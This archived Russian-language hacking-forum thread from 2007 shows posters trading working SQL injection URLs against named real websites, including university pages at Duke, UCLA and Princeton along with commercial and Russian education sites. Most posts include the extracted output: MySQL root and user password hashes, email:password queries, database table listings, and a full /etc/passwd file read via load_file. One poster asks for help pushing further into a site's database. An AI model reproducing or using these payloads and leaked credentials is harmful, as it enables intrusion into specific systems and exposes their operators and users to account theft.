ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2711  
Старый 16.07.2007, 02:14
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Duke News =\
Код:
http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(),concat(user,0x3a,password),7,8+from+mysql.user/*
root:623460e26f081bbc
web:761b2fc844890384
mnogosearch:0547d8b07eba42f3
=\
 

  #2712  
Старый 16.07.2007, 02:38
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

=\\

Цитата:
http://hostingwolf.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8 ,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
email+password
 

  #2713  
Старый 16.07.2007, 02:52
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

David Levine's Economic and Game Theory Page =\
Код:
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13+from+mysql.user/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables/*

root:7cf9857402f566aa
design:7cf9857402f566aa
replicate:7cf9857402f566aa
access:55d97f31500ff4ea
levucla:6de799125318a5b4
xjfllehhq208951:57efde0a663a5956
xfjklmghq188885:0bb7efbf598cc88a
xbiffikhq542373:72d927ea51170e2b
xgbffgkhq522308:3d012a8c0201b3b8
 

  #2714  
Старый 16.07.2007, 04:34
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

http://www.eyeforpharma.com/index.asp?ch2=174+and+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+('SubscriberContent_XREF','SUBSCRIBERS','SUBSC RIBERS_XREF','vwTravel_Contact','SubscribersBusine ss_XREF','surround','SurveyAnswers','AeroUpload',' AllArticles_DisplayTime_View','AREAS','AREAS_CHANN ELS_XREF','AREASCHANNELSVIEW','Author_Profile','AU THORS','authors_xref','AutoPrintSubs','AutoRespons e','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF', 'Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_ MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNEL S','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','C ounters','DailyNewsPopup','delegate_details','dele gates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_ XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF', 'DIRECTORY_SUBCATEGORY_XREF','directoryxls','discu ssion_delegates','DNES3_Config','DNES3_Mode3','DNE Server_Config','dtproperties','Ebusiness','EMailAr ticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIB ITING','Expo','featuredContent','FeaturedContent2' ,'feedback','FifteenWords','FrontPage_LocationMatr ix','FrontPage_Services','Gerry_temp','ICDirectory XPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD ','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_Vi ew','MCONNECT','messages','MforMobileNewsletter_Ch annelExtract','news','Newsletter','Newsletter_Clip s_Comment_View','Newsletter_ClipsComments','Newsle tter_ClipsComments_Channel','Newsletter_ClipsComme nts_XREF','Newsletter_MeetPress','Newsletter_MeetP ress_View','Newsletter_Reports_View','Newsletter_R eports_XREF','Newsletter_Responder','NewsletterArc hiveFiles','OnlineMagazines','OPENING','PANEL','PA NELSPEAKERS','PASSWORD','PERSON','PRESENTATION','p resentations','PRESENTER','PublishedNewsletters_Re ports_View','RECRUITMEN','RECRUITMENT','REGISTER', 'relatedstories','REPORT','REPORT_AREAS_XREF','Rep ort_Content_View','REPORT_DISPLAY','REPORT_POLL_XR EF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_ XREF','ReportCompanies_XREF','ReportLinkedCompanie s','Reports_By_Author_View','Resource_Articles','R esults','RESUMES','SendToFriendAddresses','SHAREPR ICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sh eet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_R EFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF',' SUBCHANNELS','SurveyQuestion','sysconstraints','sy ssegments','t_jiaozhu','tbl_IPCapture','tbl_Visito r','tblAerospaceMembers','tblAuto_Contact_Details' ,'tblAuto_Response_Category','tblAuto_Response_Con ference','tblAuto_Response_Conferences','tblAuto_R esponse_Counter','tblAuto_X_REF','tblDirCategories ','tblDirCompanies','tblDirCompanyCategoryXref','t blDirCompanyCustomerXref','tblDirCompanyPartnerXre f','tblDirWebsite','tblEmail_Wizard','tblMobile_De legates','tblPharma_Contact_Details','tblPharma_PP _Details','tblPharma_Response_Category','tblPharma _Response_Conferences','tblPharma_Response_Counter ','tblPharma_Subscriber','tblPharma_X_REF','tblTra nsport_Contact_Details','tblTransport_Response_Cat egory','tblTransport_Response_Counter','tblTranspo rt_X_REF','tblTravel_Contact','tblTravel_Contact_D etails','tblTravel_Contact_PostEvent','tblTravel_C ontact_PostEvent2005backup','tblTravel_Contact2005 backup','tblTravel_ContactMessage','tblTravel_Cont actMessage2005backup','tblTravel_Country','tblTrav el_Event','tblTravel_Response_Category','tblTravel _Response_Conferences','tblTravel_Response_Counter ','tblTravel_User','tblTravel_User_Event','tblTrav el_X_REF','Telematic','toplevel','toplevel','tpplo POLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RES ULTS','TRANSLATION','TRANSLATIONS','transport_xml_ feed_view','transportsubscribers','TRAVEL%20SEMINA R%20LIST','travel_delegates','travel_events','trav el_events_xref','travel_messages','TravelRHS','tvp 1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPe rsonalised','VisitorLogins','Visitors','vw_DailyMa ilerSubscribers','WAP','WebsiteComment','xref_Subs criberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))--


Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2)

EMailArticleUsers

OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter)

PASSWORD (PERSONCODE, EVENTCODE, CHECKED)
 

  #2715  
Старый 16.07.2007, 11:57
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

Код:
http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
Код:
http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8/*
 

  #2716  
Старый 16.07.2007, 18:08
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию

http://info.l2r.ru/?part=items&id=1+or+1=@@version--

может кто подсказать что дальше делать, чтобы получить доступ к бд сайта? что то не получается у меня
 

  #2717  
Старый 16.07.2007, 18:20
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Princeton University Program for Law and Public Affairs
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(version(),0x3a,u ser(),0x3a,database()),7,8,9,10,11,12,13,14,15,16, 17,16,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39/*

http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(user,0x3a,passwo rd),7,8,9,10,11,12,13,14,15,16,17,16,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+ from+mysql.user/*
root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

"/etc/passwd"
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F7 06173737764),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39/*
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/openpkg/lib/openpkg/bash
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:351:MySQL Server:/var/lib/mysql:/bin/bash
openpkg:x:42000:42000:/openpkg OpenPKG (management):/openpkg:/openpkg/lib/openpkg/bash
openpkg-r:x:42001:42001:/openpkg OpenPKG (restricted):/openpkg:/openpkg/lib/openpkg/bash
openpkg-n:x:42002:42002:/openpkg OpenPKG (non-privileged):/openpkg:/openpkg/lib/openpkg/bash
csgweb:x:61400:36::/home/csgweb:/bin/bash
+agvols::0:0:::
+facphoto::0:0::/var/local/as/home/facphoto:
+puombuds::0:0:::
+crosley::0:0:::
+daveh::0:0:::
+fleming::0:0:::
+nmcstaff::0:0:::
+oitdas::0:0:::
+pucap::0:0:::
+serge::0:0:::
+stevea::0:0:::
+fausey::0:0:::
+albin::0:0::/var/local/as/home/albin:
+agvols::0:0::/var/local/as/home/agvols:
+officehr::0:0::/u/officehr:
+mdmuzzie::0:0::/u/mdmuzzie:
+acla06::0:0::/u/acla06:
+genpurch::0:0::/u/genpurch:
+uait::0:0::/var/local/as/home/uait:
+pia::0:0::/u/pia:
+tafsir::0:0::/u/tafsir:
+transreg::0:0::/u/transreg:
+afrstds::0:0::/u/afrstds:
+restudy::0:0::/u/restudy:
+odc::0:0::/u/odc:
+jkchu::0:0::/u/jkchu:
+newmedia::0:0::/u/newmedia:
+ims::0:0::/var/local/as/home/ims:
+eeweb::0:0::/var/local/as/home/eeweb:
+eewebs::0:0::/var/local/as/home/eewebs:
+philosph::0:0::/var/local/as
Httpd.conf
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F6 8747470642F636F6E662F68747470642E636F6E66),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39/*
 

  #2718  
Старый 16.07.2007, 22:00
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Цитата:
http://www.lookit.biz/news.php?id=-1'+union+select+1,Version(),database(),4,5,6,user( )/*
ГЫГЫ типо сайт для ИТ спецов
 

  #2719  
Старый 16.07.2007, 23:47
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Цитата:
Сообщение от Y.Dmitriy  
ГЫГЫ типо сайт для ИТ спецов
вот так лучше..

Код:
http://www.lookit.biz/news.php?viewcount=300&viewtype=3&pt=-1+union+select+1,2,3,concat_ws(char(58),acc_login,convert(acc_pwd%20using%20cp1251),acc_email),5,6+from+account/*
Тока никак не могу подобрать кодировку пароля
 

  #2720  
Старый 17.07.2007, 01:15
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

Вот тут посмотрите
http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ